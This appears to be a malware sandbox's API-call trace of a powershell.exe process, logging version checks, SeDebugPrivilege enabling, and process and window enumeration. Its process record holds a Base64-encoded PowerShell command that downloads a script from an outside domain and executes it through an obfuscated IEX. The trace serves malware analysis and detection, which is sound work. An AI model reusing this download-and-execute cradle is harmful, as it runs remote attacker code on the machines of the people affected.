	[0969.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0970.414] SetConsoleCtrlHandler (HandlerRoutine=0x2b368dc, Add=1) returned 1
	[0970.423] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.423] CoTaskMemFree (pv=0x29d2e0) 
	[0970.432] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0970.434] CoCreateGuid (in: pguid=0x12dc10 | out: pguid=0x12dc10*(Data1=0x47648b26, Data2=0xd5ec, Data3=0x4594, Data4=([0]=0x92, [1]=0xdd, [2]=0xb, [3]=0x83, [4]=0x72, [5]=0x7, [6]=0xde, [7]=0x2b))) returned 0x0
	[0970.435] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.435] CoTaskMemFree (pv=0x29d2e0) 
	[0970.551] WinSqmIsOptedIn () returned 0x0
	[0970.551] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.551] CoTaskMemFree (pv=0x29d2e0) 
	[0970.552] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.552] CoTaskMemFree (pv=0x29d2e0) 
	[0970.553] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.553] CoTaskMemFree (pv=0x29d2e0) 
	[0970.553] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.553] CoTaskMemFree (pv=0x29d2e0) 
	[0970.554] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.554] CoTaskMemFree (pv=0x29d2e0) 
	[0970.555] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.555] CoTaskMemFree (pv=0x29d2e0) 
	[0970.555] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.555] CoTaskMemFree (pv=0x29d2e0) 
	[0970.555] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.555] CoTaskMemFree (pv=0x29d2e0) 
	[0970.557] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.557] CoTaskMemFree (pv=0x29d2e0) 
	[0970.564] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.564] CoTaskMemFree (pv=0x29d2e0) 
	[0970.567] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.567] CoTaskMemFree (pv=0x29d2e0) 
	[0970.568] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0970.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.568] CoTaskMemFree (pv=0x29d2e0) 

Thread:
	id = 448
	os_tid = 0x10ec


Thread:
	id = 457
	os_tid = 0x111c


Thread:
	id = 1461
	os_tid = 0x1118


Thread:
	id = 1468
	os_tid = 0x1a80


Thread:
	id = 1527
	os_tid = 0x1c94


Thread:
	id = 1629
	os_tid = 0x2228


Thread:
	id = 1649
	os_tid = 0x2288

	[0827.021] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 1669
	os_tid = 0x2304


Thread:
	id = 2104
	os_tid = 0x17ec


Process:
	id = "84"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x7730c000"
	os_pid = "0x520"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "21"
	os_parent_pid = "0x640"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 376
	os_tid = 0xa08

	[0829.291] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0838.337] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0838.338] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0838.338] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0838.338] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0924.383] sprintf_s (in: _DstBuf=0x28f3d8, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0944.047] GetVersionExW (in: lpVersionInformation=0x28dee0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28dee0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.049] GetVersionExW (in: lpVersionInformation=0x28dee0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28dee0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0944.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0944.061] GetVersionExW (in: lpVersionInformation=0x28dc50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28dc50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.061] SetErrorMode (uMode=0x1) returned 0x1
	[0944.062] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x28ddb0 | out: lpFileInformation=0x28ddb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0944.063] SetErrorMode (uMode=0x1) returned 0x1
	[0944.066] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x28e020 | out: lpdwHandle=0x28e020) returned 0x94c
	[0944.761] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b872b8 | out: lpData=0x2b872b8) returned 1
	[0944.763] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28df98, puLen=0x28df90 | out: lplpBuffer=0x28df98*=0x2b87354, puLen=0x28df90) returned 1
	[0944.766] lstrlenW (lpString="䅁") returned 1
	[0944.775] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x2b87430, puLen=0x28df00) returned 1
	[0944.776] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0944.778] CoTaskMemAlloc (cb=0x2e) returned 0x130820
	[0944.779] lstrcpyW (in: lpString1=0x130820, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0944.780] CoTaskMemFree (pv=0x130820) 
	[0944.780] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x2b87484, puLen=0x28df00) returned 1
	[0944.780] lstrlenW (lpString="System.Management.Automation") returned 28
	[0944.780] CoTaskMemAlloc (cb=0x3c) returned 0x69570
	[0944.780] lstrcpyW (in: lpString1=0x69570, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0944.780] CoTaskMemFree (pv=0x69570) 
	[0944.780] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x2b874e0, puLen=0x28df00) returned 1
	[0944.780] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0944.780] CoTaskMemAlloc (cb=0x20) returned 0x13a400
	[0944.780] lstrcpyW (in: lpString1=0x13a400, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0944.780] CoTaskMemFree (pv=0x13a400) 
	[0944.780] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x2b87520, puLen=0x28df00) returned 1
	[0944.780] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0944.780] CoTaskMemAlloc (cb=0x44) returned 0x69570
	[0944.780] lstrcpyW (in: lpString1=0x69570, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0944.780] CoTaskMemFree (pv=0x69570) 
	[0944.780] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x2b87588, puLen=0x28df00) returned 1
	[0944.780] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0944.780] CoTaskMemAlloc (cb=0x76) returned 0xd6330
	[0944.780] lstrcpyW (in: lpString1=0xd6330, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0944.780] CoTaskMemFree (pv=0xd6330) 
	[0944.780] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x2b87624, puLen=0x28df00) returned 1
	[0944.781] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0944.781] CoTaskMemAlloc (cb=0x44) returned 0x69570
	[0944.781] lstrcpyW (in: lpString1=0x69570, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0944.781] CoTaskMemFree (pv=0x69570) 
	[0944.781] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x2b87688, puLen=0x28df00) returned 1
	[0944.781] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0944.781] CoTaskMemAlloc (cb=0x58) returned 0x84fc0
	[0944.781] lstrcpyW (in: lpString1=0x84fc0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0944.781] CoTaskMemFree (pv=0x84fc0) 
	[0944.781] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x2b87704, puLen=0x28df00) returned 1
	[0944.781] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0944.781] CoTaskMemAlloc (cb=0x20) returned 0x13a400
	[0944.781] lstrcpyW (in: lpString1=0x13a400, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0944.781] CoTaskMemFree (pv=0x13a400) 
	[0944.781] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x2b873ac, puLen=0x28df00) returned 1
	[0944.781] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0944.781] CoTaskMemAlloc (cb=0x66) returned 0xa1570
	[0944.781] lstrcpyW (in: lpString1=0xa1570, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0944.781] CoTaskMemFree (pv=0xa1570) 
	[0944.781] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x0, puLen=0x28df00) returned 0
	[0944.782] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x0, puLen=0x28df00) returned 0
	[0944.782] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x0, puLen=0x28df00) returned 0
	[0944.782] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28ded8, puLen=0x28ded0 | out: lplpBuffer=0x28ded8*=0x2b87354, puLen=0x28ded0) returned 1
	[0944.783] CoTaskMemAlloc (cb=0x204) returned 0x79510
	[0944.783] VerLanguageNameW (in: wLang=0x0, szLang=0x79510, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0944.784] CoTaskMemFree (pv=0x79510) 
	[0944.784] VerQueryValueW (in: pBlock=0x2b872b8, lpSubBlock="\\", lplpBuffer=0x28df28, puLen=0x28df20 | out: lplpBuffer=0x28df28*=0x2b872e0, puLen=0x28df20) returned 1
	[0944.789] GetCurrentProcessId () returned 0x520
	[0944.796] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x28ce50 | out: lpLuid=0x28ce50*(LowPart=0x14, HighPart=0)) returned 1
	[0945.478] GetCurrentProcess () returned 0xffffffffffffffff
	[0945.479] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x28ce70 | out: TokenHandle=0x28ce70*=0x2e0) returned 1
	[0945.480] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2b8ab30*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0945.481] CloseHandle (hObject=0x2e0) returned 1
	[0945.485] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x520) returned 0x2e0
	[0945.495] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2b8ab98, cb=0x200, lpcbNeeded=0x28de88 | out: lphModule=0x2b8ab98, lpcbNeeded=0x28de88) returned 1
	[0945.497] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2b8ae08, cb=0x18 | out: lpmodinfo=0x2b8ae08*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0945.498] CoTaskMemAlloc (cb=0x804) returned 0x13b420
	[0945.498] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x13b420, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0945.499] CoTaskMemFree (pv=0x13b420) 
	[0945.499] CoTaskMemAlloc (cb=0x804) returned 0x13b420
	[0945.499] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x13b420, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0945.500] CoTaskMemFree (pv=0x13b420) 
	[0945.500] CloseHandle (hObject=0x2e0) returned 1
	[0945.508] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x520) returned 0x2e0
	[0945.509] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x28dfb8 | out: lpExitCode=0x28dfb8*=0x103) returned 1
	[0946.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b8b088, Length=0x20000, ResultLength=0x28df80 | out: SystemInformation=0x12b8b088, ResultLength=0x28df80*=0x4a190) returned 0xc0000004
	[0946.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bab0b8, Length=0x4c990, ResultLength=0x28df80 | out: SystemInformation=0x12bab0b8, ResultLength=0x28df80*=0x4a190) returned 0x0
	[0946.914] EnumWindows (lpEnumFunc=0x29d66ac, lParam=0x0) 
	[0947.830] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.830] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x558
	[0947.830] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.830] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.830] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.830] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x538
	[0947.830] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.830] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x778
	[0947.831] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x778
	[0947.831] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.831] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.831] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.831] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.831] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.831] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.831] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.831] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.831] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x460
	[0947.831] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.832] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x4d0
	[0947.832] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x2440
	[0947.832] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x24d8
	[0947.832] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1aa4
	[0947.832] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1ff0
	[0947.832] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1a84
	[0947.832] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1fb0
	[0947.832] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1e10
	[0947.832] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x23a8
	[0947.833] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1f24
	[0947.833] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x21ec
	[0947.833] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x2320
	[0947.833] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1fd4
	[0947.833] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1880
	[0947.833] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1b18
	[0947.833] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1d6c
	[0947.833] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x233c
	[0947.833] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x2368
	[0947.833] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x2124
	[0947.834] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x22f0
	[0947.834] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x22ac
	[0947.834] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1cdc
	[0947.834] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x10f0
	[0947.834] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1f18
	[0947.834] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x20a8
